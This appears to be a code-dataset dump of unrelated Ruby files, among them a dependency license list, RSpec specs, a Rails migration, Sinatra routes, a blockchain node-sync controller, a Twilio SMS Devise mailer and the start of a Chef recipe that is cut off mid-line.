# * simplecov 0.9.0 (http://github.com/colszowka/simplecov) - Code coverage for Ruby 1.9+ with a powerful configuration library and automatic merging of coverage across test suites
# * spork 1.0.0rc3 (http://github.com/sporkrb/spork) - spork
# * therubyrhino 2.0.2 (http://github.com/cowboyd/therubyrhino) - Embed the Rhino JavaScript interpreter into JRuby
# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copeyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# Migration: creates the profiles table with a single string name column
# plus the standard Rails created_at/updated_at timestamp columns.
class CreateProfiles < ActiveRecord::Migration
  def change
    create_table :profiles do |t|
      t.string :name

      t.timestamps
    end
  end
end
| 73.177665 | 206 | 0.636792 |
627af19b5e9521eb7ee83d8f4ca67f4e2028fd06 | 974 | require 'spec_helper'
describe 'user:reset_login_tokens' do
  include_context 'rake'

  let!(:first_user) { create_user(email: '[email protected]') }
  let!(:second_user) { create_user(email: '[email protected]') }

  before do
    # Backdate the modified timestamps so we can assert the task rotates
    # tokens without touching modification dates.
    first_user.update_attribute('modified', 10.days.ago)
    second_user.update_attribute('modified', 10.days.ago)
  end

  it 'updates all login tokens for users and does not update the modified date' do
    subject.invoke

    updated_first_user = Plink::UserRecord.find(first_user.id)
    updated_second_user = Plink::UserRecord.find(second_user.id)

    updated_first_user.login_token.should_not == first_user.login_token
    updated_first_user.modified.to_date.should == first_user.modified.to_date

    updated_second_user.login_token.should_not == second_user.login_token
    updated_second_user.modified.to_date.should == second_user.modified.to_date

    # New tokens must also be unique across users.
    updated_first_user.login_token.should_not == updated_second_user.login_token
  end
end
| 37.461538 | 82 | 0.777207 |
# Namespace for the ShippingEasy client gem.
module ShippingEasy
  # Gem version. Frozen so the shared constant cannot be mutated in place.
  VERSION = "0.7.1".freeze
end
| 11 | 19 | 0.704545 |
91a6a08bf139b2e18e1dcc3ff92a9bcbed65ca20 | 749 | require 'spec_helper'
describe Project do
  let(:url) { '[email protected]:joelmoss/strano.git' }
  let(:user) { FactoryGirl.create(:user) }
  let(:cloned_project) { FactoryGirl.build_stubbed(:project) }

  before(:each) do
    # GitHub API calls are replayed from VCR cassettes using this token.
    Github.strano_user_token = user.github_access_token
    @project = Project.create :url => url
  end

  it "should set the github data after save", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
    @project.github_data.should_not be_empty
  end

  describe "#repo", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
    it { @project.repo.should be_a(Strano::Repo) }
  end

  describe "#github", :vcr => { :cassette_name => 'Github_Repo/_repo' } do
    it { @project.github.should be_a(Github::Repo) }
  end
end
| 27.740741 | 98 | 0.680908 |
26b4b4ebc860bb9dc541cd6e184099e49c24107a | 3,209 | require File.dirname(__FILE__) + '/../../spec_helper'
# Controller spec for Users::OpenAuthenticationsController: access control
# (self or admin only) for the index/new actions, plus redirects to the
# correct third-party OAuth authorize URLs per provider.
describe Users::OpenAuthenticationsController do
  before(:each) do
    controller.set_current_user = nil
  end
  before(:all) do
    # before(:all) state is shared across examples in this file.
    truncate_all_tables
    Language.create_english
    CuratorLevel.create_enumerated
    @user = User.gen
    @other_user = User.gen
    @admin = User.gen(:admin => true)
  end
  describe 'GET index' do
    it 'should only be accessible by self and administrators' do
      controller.set_current_user = @user
      get :index, {:user_id => @user.id}
      assigns[:user].should == @user
      response.should render_template('users/open_authentications/index')
      # Any other (non-admin) user is rejected with a SecurityViolation.
      controller.set_current_user = @other_user
      expect { get :index, {:user_id => @user.id} }.
        to raise_error(EOL::Exceptions::SecurityViolation)
      controller.set_current_user = @admin
      get :index, {:user_id => @user.id}
      response.code.should == '200'
      controller.set_current_user = nil
      expect { get :index, {:user_id => @user.id} }.
        to raise_error(EOL::Exceptions::SecurityViolation)
    end
  end
  describe 'GET new' do
    it 'should redirect to index unless we have an oauth provider param' do
      get :new, {:user_id => @user.id}, {:user_id => @user.id}
      expect(response).to redirect_to(user_open_authentications_url(@user.id))
    end
    it 'should only be accessible by self or admin' do
      # Stub the OAuth handshake so no real provider traffic happens here.
      oauth = double(EOL::OpenAuth, access_denied?: false, authorized?: false, session_data: {}, authorize_uri: '')
      EOL::OpenAuth.stub(:init) { oauth }
      controller.set_current_user = @user
      expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.not_to raise_error
      controller.set_current_user = @admin
      expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.not_to raise_error
      controller.set_current_user = nil
      expect { get :new, { :user_id => @user.id, :oauth_provider => 'provider'} }.
        to raise_error(EOL::Exceptions::SecurityViolation)
    end
    it 'should redirect to authorize uri when adding connection to Facebook' do
      get :new, { :user_id => @user.id, :oauth_provider => 'facebook' }, {:user_id => @user.id}
      response.header['Location'].should =~ /^https:\/\/graph.facebook.com\/oauth\/authorize/
    end
    it 'should redirect to authorize uri when adding connection to Google' do
      get :new, { :user_id => @user.id, :oauth_provider => 'google' }, {:user_id => @user.id}
      response.header['Location'].should =~ /^https:\/\/accounts.google.com\/o\/oauth2\/auth/
    end
    it 'should redirect to authorize uri when adding connection to Twitter' do
      # OAuth 1.0a providers need a request-token exchange stubbed first.
      stub_oauth_requests
      get :new, { :user_id => @user.id, :oauth_provider => 'twitter' }, {:user_id => @user.id}
      response.header['Location'].should =~ /https:\/\/api.twitter.com\/oauth\/authenticate/
    end
    it 'should redirect to authorize uri when adding connection to Yahoo' do
      stub_oauth_requests
      get :new, { :user_id => @user.id, :oauth_provider => 'yahoo' }, {:user_id => @user.id}
      response.header['Location'].should =~ /https:\/\/api.login.yahoo.com\/oauth\/v2\/request_auth/
    end
  end
end
| 43.364865 | 115 | 0.662823 |
5dfcb3f829aa28d9d3fd899419f3dcc1aac96b1e | 4,284 | # frozen_string_literal: true
require_relative 'spec_helper'
# CLI-level smoke tests for the asciidoctor-pdf executable: packaging, -V
# output, loading as an Asciidoctor backend, visual comparison of the shipped
# examples, stdout redirection, pdfmark generation and scratch-file retention.
describe 'asciidoctor-pdf' do
  context 'Packaging' do
    it 'should install bin script named asciidoctor-pdf' do
      bin_script = (Pathname.new Gem.bindir) / 'asciidoctor-pdf'
      # Fall back to Gem.bin_path for installs that don't use Gem.bindir.
      bin_script = Pathname.new Gem.bin_path 'asciidoctor-pdf', 'asciidoctor-pdf' unless bin_script.exist?
      (expect bin_script).to exist
    end
  end
  context 'Options' do
    it 'should print the version of Asciidoctor PDF to stdout when invoked with the -V flag', cli: true do
      out, _, res = run_command asciidoctor_pdf_bin, '-V'
      (expect res.exitstatus).to be 0
      (expect out).to include %(Asciidoctor PDF #{Asciidoctor::PDF::VERSION} using Asciidoctor #{Asciidoctor::VERSION})
    end
  end
  context 'Require' do
    it 'should load converter if backend is pdf and require is asciidoctor-pdf', cli: true do
      out, err, res = run_command asciidoctor_bin, '-r', 'asciidoctor-pdf', '-b', 'pdf', '-D', output_dir, (fixture_file 'hello.adoc'), use_bundler: true
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      (expect Pathname.new output_file 'hello.pdf').to exist
    end
    it 'should load converter if backend is pdf and require is asciidoctor/pdf', cli: true do
      out, err, res = run_command asciidoctor_bin, '-r', 'asciidoctor/pdf', '-b', 'pdf', '-D', output_dir, (fixture_file 'hello.adoc'), use_bundler: true
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      (expect Pathname.new output_file 'hello.pdf').to exist
    end
  end if defined? Bundler
  context 'Examples' do
    it 'should convert the basic example', cli: true, visual: true do
      out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (example_file 'basic-example.adoc')
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      reference_file = File.absolute_path example_file 'basic-example.pdf'
      (expect output_file 'basic-example.pdf').to visually_match reference_file
    end
    it 'should convert the chronicles example', cli: true, visual: true do
      out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (example_file 'chronicles-example.adoc')
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      reference_file = File.absolute_path example_file 'chronicles-example.pdf'
      (expect output_file 'chronicles-example.pdf').to visually_match reference_file
    end unless ENV['ROUGE_VERSION'] && ENV['ROUGE_VERSION'].split[-1] < '2.1.0'
  end
  context 'redirection' do
    it 'should be able to write output to file via stdout', cli: true do
      run_command asciidoctor_pdf_bin, '-o', '-', (fixture_file 'book.adoc'), out: (to_file = output_file 'book.pdf')
      (expect Pathname.new to_file).to exist
      (expect { PDF::Reader.new to_file }).not_to raise_exception
    end
  end unless windows? && RUBY_ENGINE == 'jruby'
  context 'pdfmark' do
    it 'should generate pdfmark file if pdfmark attribute is set', cli: true do
      out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, '-a', 'pdfmark', (fixture_file 'book.adoc')
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      pdfmark_file = Pathname.new output_file 'book.pdfmark'
      (expect pdfmark_file).to exist
      pdfmark_contents = pdfmark_file.read
      (expect pdfmark_contents).to include '/Title (Book Title)'
      (expect pdfmark_contents).to include '/Author (Author Name)'
      (expect pdfmark_contents).to include '/DOCINFO pdfmark'
    end
  end
  context 'keep artifacts' do
    it 'should generate scratch file if KEEP_ARTIFACTS environment variable is set', cli: true do
      out, err, res = run_command asciidoctor_pdf_bin, '-D', output_dir, (fixture_file 'dry-run-block.adoc'), env: { 'KEEP_ARTIFACTS' => 'true' }
      (expect res.exitstatus).to be 0
      (expect out).to be_empty
      (expect err).to be_empty
      scratch_file = Pathname.new output_file 'dry-run-block-scratch.pdf'
      (expect scratch_file).to exist
      (expect { PDF::Reader.new scratch_file }).not_to raise_exception
    end
  end
end
| 45.094737 | 153 | 0.692577 |
ab89456902532978204c7076052050c8aff6f65b | 1,150 | # frozen_string_literal: true
require 'spec_helper'
module GraphqlRails
  module Model
    # Spec for BuildGraphqlInputType: building a GraphQL::Schema::InputObject
    # subclass with the given name, description and camelCased arguments.
    RSpec.describe BuildGraphqlInputType do
      subject(:builder) { described_class.new(name: name, description: description, attributes: attributes) }
      let(:name) { 'DummyInput' }
      let(:description) { 'This is dummy input' }
      let(:attributes) do
        {
          id: GraphqlRails::Attributes::InputAttribute.new(:id),
          full_name: GraphqlRails::Attributes::InputAttribute.new(:full_name!)
        }
      end
      describe '#call' do
        subject(:call) { builder.call }
        it 'returns graphql input class' do
          expect(call < ::GraphQL::Schema::InputObject).to be true
        end
        it 'sets correct name' do
          expect(call.graphql_name).to eq name
        end
        it 'sets correct description' do
          expect(call.description).to eq description
        end
        it 'sets correct attributes', :aggregate_failures do
          # The bang suffix on :full_name! marks the argument as non-null.
          expect(call.arguments['fullName'].type).to be_non_null
          expect(call.arguments['id'].type).not_to be_non_null
        end
      end
    end
  end
end
| 27.380952 | 109 | 0.630435 |
397a1f24585556d32892faae9b1f735c35a62d15 | 97 | require 'dry-struct'
module OmniScrapperOutput
  # dry-types container: including Dry.Types() defines the standard type
  # registry (Types::String, Types::Coercible::*, ...) as constants under
  # this module for use in Dry::Struct attribute declarations.
  module Types
    include Dry.Types()
  end
end
| 12.125 | 25 | 0.742268 |
1d546eec8dea36bbaa9d0ce246bd2c94122c5ad6 | 1,125 | get '/decks/:deck_id/cards' do
  # Study view: every card in the deck, in study order, plus the current
  # user's game state for this deck.
  @deck = Deck.find(params[:deck_id])
  @game = @deck.game_for_user(current_user)
  @cards = @deck.cards.study_order
  haml :'cards/index'
end
# New-card form; scoping through created_decks restricts it to deck owners.
get '/decks/:deck_id/cards/new' do
  @deck = current_user.created_decks.find(params[:deck_id])
  haml :'cards/new'
end
# Edit form; only cards the current user created can be edited.
get '/decks/:deck_id/cards/:card_id/edit' do
  @deck = Deck.find(params[:deck_id])
  @card = current_user.created_cards.find(params[:card_id])
  haml :'cards/edit'
end
# Create a card. AJAX callers get just the new table row partial; regular
# form posts are redirected back to the deck's card list.
post '/decks/:deck_id/cards' do
  card = Card.create(params[:card].merge(creator_id: current_user.id, deck_id: params[:deck_id]))
  if request.xhr?
    haml :'cards/_row', locals: { card: card, deck: Deck.find(params[:deck_id]) }, layout: false
  else
    redirect "/decks/#{params[:deck_id]}/cards"
  end
end
put '/decks/:deck_id/cards/:card_id' do
  card = current_user.created_cards.find(params[:card_id])
  card.update(params[:card])
  redirect "/decks/#{params[:deck_id]}/cards"
end
delete '/decks/:deck_id/cards/:card_id' do
  card = current_user.created_cards.find(params[:card_id])
  card.destroy
  redirect "/decks/#{params[:deck_id]}/cards"
end
| 26.162791 | 97 | 0.704 |
38deeb3b68d029088c3d9d5d5b3ac65e1a185876 | 60 | puts "Enter Your Name"
# Read one line from stdin, stripping the trailing newline, then greet.
name = gets.chomp
puts "Hi, #{name}"
| 15 | 22 | 0.666667 |
ac5018af6a71d09df181ff1a4fa39c779e8be1c4 | 3,461 | require 'net/http'
# CRUD for blockchain peer Nodes, plus a sync action that pulls a remote
# node's chain over HTTP and merges it into the local one.
class NodesController < ApplicationController
  before_action :set_node, only: %i[show edit update destroy]

  # GET /nodes
  # GET /nodes.json
  def index
    @nodes = Node.all
  end

  # GET /nodes/1
  # GET /nodes/1.json
  def show; end

  # GET /nodes/new
  def new
    @node = Node.new
  end

  # GET /nodes/1/edit
  def edit; end

  def register; end

  # Fetches the remote node's blocks, validates the hash chain, and merges
  # it into ours when valid.
  def sync
    @node = Node.find(params[:id])
    @blocks = parse_blocks fetch_blocks(@node)
    ours = Chain.new(Block.all)
    theirs = Chain.new(@blocks)
    if theirs.is_hash_valid?
      merged = ours.merge theirs
      logger.info merged
      message = merged ? 'Our Chain was successfully synced from Node.' : 'Our Chain is up to date.'
      # BUG FIX: this previously did `render :show, notice: 'message'`, which
      # (a) passed the literal string 'message' instead of the variable and
      # (b) used a :notice option that `render` silently ignores. Setting
      # flash.now makes the message visible to the rendered view.
      flash.now[:notice] = message
      render :show
    else
      # Same fix as above: `render :show, alert: ...` never reached the view.
      flash.now[:alert] = 'Node had invalid chain.'
      render :show
    end
  end

  # POST /nodes
  # POST /nodes.json
  def create
    @node = Node.new(node_params)
    respond_to do |format|
      if @node.save
        # Announce the new peer to the event log.
        Event.post_new_node(@node)
        format.html { redirect_to @node, notice: 'Node was successfully created.' }
        format.json { render :show, status: :created, location: @node }
      else
        format.html { render :new }
        format.json { render json: @node.errors, status: :unprocessable_entity }
      end
    end
  end

  # PATCH/PUT /nodes/1
  # PATCH/PUT /nodes/1.json
  def update
    respond_to do |format|
      if @node.update(node_params)
        format.html { redirect_to @node, notice: 'Node was successfully updated.' }
        format.json { render :show, status: :ok, location: @node }
      else
        format.html { render :edit }
        format.json { render json: @node.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /nodes/1
  # DELETE /nodes/1.json
  def destroy
    @node.destroy
    respond_to do |format|
      format.html { redirect_to nodes_url, notice: 'Node was successfully destroyed.' }
      format.json { head :no_content }
    end
  end

  private

  # Use callbacks to share common setup or constraints between actions.
  def set_node
    @node = Node.find(params[:id])
  end

  # Never trust parameters from the scary internet, only allow the white list through.
  def node_params
    params.require(:node).permit(:available, :host, :node_id)
  end

  # Converts the remote JSON payload (camelCase keys, epoch-second
  # timestamps) into unsaved Block records with their Transactions attached.
  def parse_blocks(chain_data)
    blocks_data = chain_data['blocks']
    blocks = []
    blocks_data.each do |block|
      block['block_index'] = block.delete('index')
      block['previous_block_hash'] = block.delete('previousBlockHash')
      block['timestamp'] = Time.at(block.delete('timestamp'))
      transactions = parse_transactions block.delete('transactions')
      new_block = Block.new(block)
      new_block.transactions = transactions
      blocks << new_block
    end
    blocks
  end

  # Maps raw transaction hashes onto unsaved Transaction records.
  def parse_transactions(transactions_data)
    transactions = []
    transactions_data.each do |transaction|
      transaction['transaction_id'] = transaction.delete('id')
      transaction['timestamp'] = Time.at(transaction.delete('timestamp'))
      transactions << Transaction.new(transaction)
    end
    transactions
  end

  # GETs "#{node.host}/blocks" and returns the parsed JSON body.
  # NOTE(review): assumes node.host carries a scheme/port URI.parse can
  # split — confirm against stored Node records.
  def fetch_blocks(node)
    uri = URI.parse("#{node.host}/blocks")
    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Get.new(uri.request_uri)
    request.initialize_http_header('Accept' => 'application/json')
    response = http.request(request)
    data = response.body
    JSON.parse(data)
  end
end
| 26.623077 | 100 | 0.658191 |
# Devise "mailer" that delivers password-reset, confirmation and unlock
# links over SMS via Twilio instead of email. The three public methods keep
# Devise's mailer signatures; the duplicated Twilio send has been extracted
# into a private helper.
class AuthenticationMailer < Devise::Mailer
  helper :application
  include Devise::Controllers::UrlHelpers

  def reset_password_instructions(record, token, opts={})
    link_to_reset_password = edit_password_url(record, reset_password_token: token)
    send_sms(record, "Call for Practice: Click to set your password. #{link_to_reset_password}")
  end

  def confirmation_instructions(record, token, opts={})
    link_to_confirm = confirmation_url(record, confirmation_token: token)
    send_sms(record, "Call for Practice: Click to confirm your phone number. #{link_to_confirm}")
  end

  def unlock_instructions(record, token, opts={})
    link_to_unlock = unlock_url(record, unlock_token: token)
    send_sms(record, "Call for Practice: Click to unlock your account. #{link_to_unlock}")
  end

  private

  # Sends one SMS from the app's Twilio number to the record's phone number.
  def send_sms(record, body)
    twilio_client.messages.create(
      from: ENV["TWILIO_APP_PHONE_NUMBER"],
      to: record.phone_number,
      body: body
    )
  end

  # Builds a fresh Twilio REST client from environment credentials per call.
  def twilio_client
    Twilio::REST::Client.new(ENV["TWILIO_ACCOUNT_SID"], ENV["TWILIO_AUTH_TOKEN"])
  end
end
| 31.769231 | 87 | 0.728006 |
263abb360f684fb73d8c899530b071ccc36ec172 | 964 | module Importex
class Column
attr_reader :name
def initialize(name, options = {})
@name = name
@type = options[:type]
@format = [options[:format]].compact.flatten
@required = options[:required]
end
def cell_value(str, row_number)
validate_cell(str)
@type ? @type.importex_value(str) : str
rescue InvalidCell => e
raise InvalidCell, "#{str} (column #{name}, row #{row_number+1}) does not match required format: #{e.message}"
end
def validate_cell(str)
if @format && [email protected]? && [email protected]? { |format| match_format?(str, format) }
raise InvalidCell, @format.reject { |r| r.kind_of? Proc }.inspect
end
end
def match_format?(str, format)
case format
when String then str == format
when Regexp then str =~ format
when Proc then format.call(str)
end
end
def required?
@required
end
end
end
| 25.368421 | 116 | 0.602697 |
f7ec1b1ae429d958e70559201ac821c4b5fdfe81 | 4,196 | require 'spec_helper'
# Spec for Volt::PhoneNumberValidator: the .validate class-method entry
# point, #valid? against the default and custom regexes, and the error-hash
# shapes (default and custom messages) returned by #errors.
describe Volt::PhoneNumberValidator do
  subject { Volt::PhoneNumberValidator.new(*params) }
  let(:params) { [model, field_name, options] }
  let(:model) { Volt::Model.new phone_number: phone_number }
  let(:field_name) { :phone_number }
  let(:options) { true }
  let(:valid_us_number) { '(123)-123-1234' }
  let(:valid_intl_number) { '+12 123 123 1234' }
  let(:invalid_number) { '1234-123-123456' }
  let(:phone_number) { valid_us_number }
  describe '.validate' do
    # .validate takes an extra (unused here) second argument, hence insert.
    let(:result) { described_class.validate(*params.dup.insert(1, nil)) }
    before do
      allow(described_class).to receive(:new).and_return subject
      allow(subject).to receive(:errors).and_call_original
      result
    end
    it 'initializes a phone number validator with the provided arguments' do
      expect(described_class).to have_received(:new).with(*params)
    end
    it 'calls errors on the phone number validator' do
      expect(subject).to have_received :errors
    end
    it 'returns the result of calling errors on the validator' do
      expect(subject.errors).to eq result
    end
  end
  describe '#valid?' do
    context 'when using the default regex' do
      let(:options) { true }
      context 'when the phone number is a valid US number' do
        let(:phone_number) { valid_us_number }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when the phone number is a valid international number' do
        let(:phone_number) { valid_intl_number }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when the phone number uses dashes' do
        let(:phone_number) { '123-123-1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when the phone number uses periods' do
        let(:phone_number) { '123.123.1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when the phone number uses spaces' do
        let(:phone_number) { '123 123 1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when the phone number uses parentheses and a space' do
        let(:phone_number) { '(123) 123.1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when an international number uses a plus' do
        let(:phone_number) { '+12 123 123 1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when an international number does not use a plus' do
        let(:phone_number) { '12 123 123 1234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'when an international number is from the UK' do
        # UK-style numbers have a four-digit middle group.
        let(:phone_number) { '+12 123 1234 1234' }
        specify { expect(subject.valid?).to eq true }
      end
    end
    context 'when using a custom regex' do
      let(:options) { { with: /\d{10}/ } }
      context 'and the phone number qualifies' do
        let(:phone_number) { '1231231234' }
        specify { expect(subject.valid?).to eq true }
      end
      context 'and the phone number does not qualify' do
        let(:phone_number) { '123-123-1234' }
        specify { expect(subject.valid?).to eq false }
      end
    end
  end
  describe '#errors' do
    context 'when the model has a valid phone number' do
      let(:phone_number) { valid_us_number }
      it 'returns an empty error hash' do
        expect(subject.errors).to eq({})
      end
    end
    context 'when the model has an invalid phone number' do
      let(:phone_number) { invalid_number }
      it 'returns an array of errors for phone number' do
        expect(subject.errors).to eq(
          phone_number: ['must be a phone number with area or country code'])
      end
    end
    context 'when provided a custom error message' do
      let(:options) { { message: custom_message } }
      let(:custom_message) { 'this is a custom message' }
      context 'and the phone number is invalid' do
        let(:phone_number) { invalid_number }
        it 'returns errors with the custom message' do
          expect(subject.errors).to eq(phone_number: [custom_message])
        end
      end
    end
  end
end
e2b57b36d1a040a7e47c18d28a74d6de279453fd | 215 | require "google/cloud/language"
class GoogleDriveWrapper
  attr_reader :client

  # NOTE(review): despite the class name, this builds a Google Cloud
  # *Language* client, not a Drive one — confirm whether the name or the
  # client is wrong. Credentials are read as JSON from GOOGLE_CREDENTIALS;
  # a missing/invalid env var raises here (TypeError/JSON::ParserError).
  def initialize
    @client = Google::Cloud::Language.new(credentials: JSON.parse(ENV["GOOGLE_CREDENTIALS"]))
  end
end
| 19.545455 | 97 | 0.716279 |
bfada4e921022b6333dada739d3c87572f3ed5dd | 656 | # frozen_string_literal: true
# This model represents the 'site-config' content type in Contentful. Any linked
# entries of the 'site-config' content type will be resolved as instances of this class.
# It exposes .find, .find_by, and .find_all methods to query Contentful.
class SiteConfig < WCC::Contentful::Model::SiteConfig
  # All attributes and query behavior are inherited from the generated
  # WCC::Contentful model; this subclass is the app-level extension point.
  #
  # # Example: override equality
  # def ===(other)
  #   ...
  # end
  #
  # # Example: override "title" attribute to always be titlecase.
  # # `@title` is populated by the gem in the initializer.
  # def title
  #   @title_titlecased ||= @title.titlecase
  # end
end
| 32.8 | 88 | 0.696646 |
1a7317cf51604008c6c53d71f36022eb4660ceba | 942 | # encoding: utf-8
require File.expand_path('spec_helper', File.dirname(__FILE__))
# Watir-style spec for the links collection against the shared
# non_control_elements.html fixture (expects exactly 4 links, 1-based
# :index addressing).
describe "Links" do
  before :each do
    browser.goto(WatirSpec.files + "/non_control_elements.html")
  end
  describe "#length" do
    it "returns the number of links" do
      browser.links.length.should == 4
    end
  end
  describe "#[]" do
    it "returns the link at the given index" do
      browser.links[3].id.should == "link_3"
    end
    # Lazy element lookup: out-of-range indexes still yield a Link object.
    it "returns a Link object also when the index is out of bounds" do
      browser.links[2000].should_not be_nil
    end
  end
  describe "#each" do
    it "iterates through links correctly" do
      index = 0
      browser.links.each do |c|
        index += 1
        c.name.should == browser.link(:index, index).name
        c.id.should == browser.link(:index, index).id
        c.value.should == browser.link(:index, index).value
      end
      browser.links.length.should == index
    end
  end
end
| 23.55 | 70 | 0.641189 |
1c0a1e0ee2d93587dee68d7de7c4ab6b5c9cb014 | 4,385 | # Cookbook:: splunk_otel_collector
# Recipe:: default
# Fail the run early when no access token was provided.
ruby_block 'splunk-access-token-unset' do
  block do
    raise "Set ['splunk_access_token']['splunk_access_token'] as an attribute or on the node's run_state."
  end
  only_if { node['splunk_otel_collector']['splunk_access_token'].nil? }
end
if platform_family?('windows')
  include_recipe 'splunk_otel_collector::collector_win_install'
  include_recipe 'splunk_otel_collector::collector_win_registry'
  directory ::File.dirname(node['splunk_otel_collector']['collector_config_dest']) do
